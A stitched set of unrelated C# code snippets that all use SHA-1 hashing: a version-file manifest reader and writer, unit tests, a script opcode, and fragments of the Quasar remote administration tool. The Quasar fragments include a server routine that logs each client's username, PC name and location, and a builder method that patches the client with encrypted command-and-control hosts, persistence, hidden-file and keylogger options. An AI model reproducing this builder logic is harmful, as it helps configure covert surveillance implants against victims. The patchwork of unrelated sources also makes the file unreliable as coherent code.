/// <summary>
/// 读取数据
/// </summary>
/// <param name="ver"></param>
/// <param name="hash"></param>
/// <param name="filecount"></param>
/// <param name="path"></param>
/// <returns></returns>
public bool Read(int ver, string hash, int filecount, string path)
{
//获得文件存储路径
string g = this.Group.Replace('/', '_');
string file = Path.Combine(path, string.Format("{0}.ver.txt", g));
//文件不存在
if (!File.Exists(file))
{
return(false);
}
//获取版本文件的hash值
using (Stream s = File.OpenRead(file))
{
var chash = Sha1.ComputeHash(s);
var shash = Convert.ToBase64String(chash);
//文件Hash值不匹配
if (!string.Equals(shash, hash))
{
return(false);
}
}
//获得文件内容
string txt = File.ReadAllText(file, Encoding.UTF8);
//对文件内容进行剪切
string[] lines = txt.Split(new string[] { "\n", "\r" }, StringSplitOptions.RemoveEmptyEntries);
//循环遍历数据
foreach (var l in lines)
{
if (l.IndexOf("Ver:") == 0)
{
//如果是文件标头内容
var sp = l.Split(new string[] { "Ver:", "|FileCount:" }, StringSplitOptions.RemoveEmptyEntries);
int vercount = int.Parse(sp[0]);
int count = int.Parse(sp[1]);
//如果版本号不匹配
if (vercount != ver)
{
return(false);
}
//如果文件个数不匹配
if (count != filecount)
{
return(false);
}
}
else
{
//如果是文件普通内容, 文件匹配那么更新存储数据
var sp = l.Split('|');
FileHash[sp[0]] = string.Format("{0}|{1}", sp[1], sp[2]);
}
}
return(true);
}
public void Sha1_ComputeHash()
{
byte[] result = Sha1.ComputeHash(new byte[] { 0, 1, 2, 3 }, 1, 2);
string resultString = System.BitConverter.ToString(result);
Assert.AreEqual("0C-A6-23-E2-85-5F-2C-75-C8-42-AD-30-2F-E8-20-E4-1B-4D-19-7D", resultString);
}
/// <summary>
/// 存储版本文件路径
/// </summary>
/// <param name="ver"></param>
/// <param name="path"></param>
/// <returns></returns>
public string SaveToPath(int ver, string path)
{
//存储文件标头信息
string outstr = string.Format("Ver:{0}|FileCount:{1}\n", ver, this.FileHash.Count);
StringBuilder sb = new StringBuilder();
foreach (var f in FileHash)
{
//把文件名和文件的hash值添加到输出字符串里
sb.Append(f.Key + "|" + f.Value + "\n");
}
outstr = string.Format("{0}{1}", outstr, sb.ToString());
//获得输出文件
string g = this.Group.Replace('/', '_');
string outfile = Path.Combine(path, string.Format("{0}.ver.txt", g));
//存储文件
File.WriteAllText(outfile, outstr, Encoding.UTF8);
//获取新的版本文件的hash值
using (Stream s = File.OpenRead(outfile))
{
var hash = Sha1.ComputeHash(s);
var shash = Convert.ToBase64String(hash);
return(shash);
}
}
public void TestSha1()
{
var sha1 = new Sha1();
var bytes = Encoding.UTF8.GetBytes("abc");
var hash = sha1.ComputeHash(bytes);
var sha1str = BitConverter.ToString(hash).Replace("-", "").ToLowerInvariant();
Assert.AreEqual(sha1str, "a9993e364706816aba3e25717850c26c9cd0d89d");
}
/// <summary>
/// 获得文件唯一Hash值
/// </summary>
void GetHashOne(string filename)
{
using (Stream s = File.OpenRead(filename))
{
var hash = Sha1.ComputeHash(s);
var shash = string.Format("{0}|{1}", Convert.ToBase64String(hash), s.Length);
//去除文件组表头,只有文件名字信息
filename = filename.Substring(Group.Length + 1);
filename = filename.Replace('\\', '/');
FileHash[filename] = shash;
}
}
/// <summary>
/// Replaces top stack item with its hash digest. Return value indicates success.
/// </summary>
/// <param name="opData">Data to use</param>
/// <param name="error">Error message (null if sucessful, otherwise will contain information about the failure)</param>
/// <returns>True if operation was successful, false if otherwise</returns>
public override bool Run(IOpData opData, out string error)
{
if (opData.ItemCount < 1)
{
error = Err.OpNotEnoughItems;
return(false);
}
using Sha1 hash = new Sha1();
opData.Push(hash.ComputeHash(opData.Pop()));
error = null;
return(true);
}
private bool IdentifyClient(Client client, ClientIdentification packet)
{
if (packet.Id.Length != 64)
{
return(false);
}
client.Value.Version = packet.Version;
client.Value.OperatingSystem = packet.OperatingSystem;
client.Value.AccountType = packet.AccountType;
client.Value.Country = packet.Country;
client.Value.CountryCode = packet.CountryCode;
client.Value.Region = packet.Region;
client.Value.City = packet.City;
client.Value.Id = packet.Id;
client.Value.Username = packet.Username;
client.Value.PcName = packet.PcName;
client.Value.Tag = packet.Tag;
client.Value.ImageIndex = packet.ImageIndex;
client.Value.EncryptionKey = packet.EncryptionKey;
// TODO: Refactor tooltip
//if (Settings.ShowToolTip)
// client.Send(new GetSystemInfo());
#if !DEBUG
try
{
var csp = (RSACryptoServiceProvider)ServerCertificate.PublicKey.Key;
return(csp.VerifyHash(Sha256.ComputeHash(Encoding.UTF8.GetBytes(packet.EncryptionKey)), CryptoConfig.MapNameToOID("SHA256"), packet.Signature) || csp.VerifyHash(Sha1.ComputeHash(Encoding.UTF8.GetBytes(packet.EncryptionKey)), CryptoConfig.MapNameToOID("SHA1"), packet.Signature));
}
catch (Exception)
{
return(false);
}
#else
return(true);
#endif
}
static bool VerifyHash()
{
try
{
var csp = (RSACryptoServiceProvider)SERVERCERTIFICATE.PublicKey.Key;
return(csp.VerifyHash(Sha256.ComputeHash(Encoding.UTF8.GetBytes(ENCRYPTIONKEY)), CryptoConfig.MapNameToOID("SHA256"),
Convert.FromBase64String(SERVERSIGNATURE)) || csp.VerifyHash(Sha1.ComputeHash(Encoding.UTF8.GetBytes(ENCRYPTIONKEY)), CryptoConfig.MapNameToOID("SHA1"),
Convert.FromBase64String(SERVERSIGNATURE)));
}
catch (Exception)
{
return(false);
}
}
private void WriteSettings(AssemblyDefinition asmDef)
{
var key = StringHelper.GetRandomString(32);
var aes = new Aes256(key);
var caCertificate = new X509Certificate2(Settings.CertificatePath, Settings.CertificatePassword, X509KeyStorageFlags.Exportable);
var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert)); // export without private key, very important!
byte[] signature;
using (var csp = (RSACryptoServiceProvider)caCertificate.PrivateKey)
{
var hash = Sha256.ComputeHash(Encoding.UTF8.GetBytes(key));
try
{
signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA256"));
}
catch (Exception ex)
{
Console.WriteLine("Attempting to sign SHA1 Hash instead of SHA256 since certificate doesn't support SHA256");
hash = Sha1.ComputeHash(Encoding.UTF8.GetBytes(key));
signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA1"));
}
}
foreach (var typeDef in asmDef.Modules[0].Types)
{
if (typeDef.FullName == "Quasar.Client.Config.Settings")
{
foreach (var methodDef in typeDef.Methods)
{
if (methodDef.Name == ".cctor")
{
int strings = 1, bools = 1;
for (int i = 0; i < methodDef.Body.Instructions.Count; i++)
{
if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldstr) // string
{
switch (strings)
{
case 1: //version
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.Version);
break;
case 2: //ip/hostname
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.RawHosts);
break;
case 3: //installsub
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.InstallSub);
break;
case 4: //installname
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.InstallName);
break;
case 5: //mutex
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.Mutex);
break;
case 6: //startupkey
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.StartupName);
break;
case 7: //encryption key
methodDef.Body.Instructions[i].Operand = key;
break;
case 8: //tag
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.Tag);
break;
case 9: //LogDirectoryName
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.LogDirectoryName);
break;
case 10: //ServerSignature
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
break;
case 11: //ServerCertificate
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert)));
break;
}
strings++;
}
else if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4_1 ||
methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4_0) // bool
{
switch (bools)
{
case 1: //install
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.Install));
break;
case 2: //startup
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.Startup));
break;
case 3: //hidefile
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.HideFile));
break;
case 4: //Keylogger
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.Keylogger));
break;
case 5: //HideLogDirectory
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.HideLogDirectory));
break;
case 6: // HideInstallSubdirectory
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.HideInstallSubdirectory));
break;
}
bools++;
}
else if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4) // int
{
//reconnectdelay
methodDef.Body.Instructions[i].Operand = _options.Delay;
}
else if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4_S) // sbyte
{
methodDef.Body.Instructions[i].Operand = GetSpecialFolder(_options.InstallPath);
}
}
}
}
}
}
}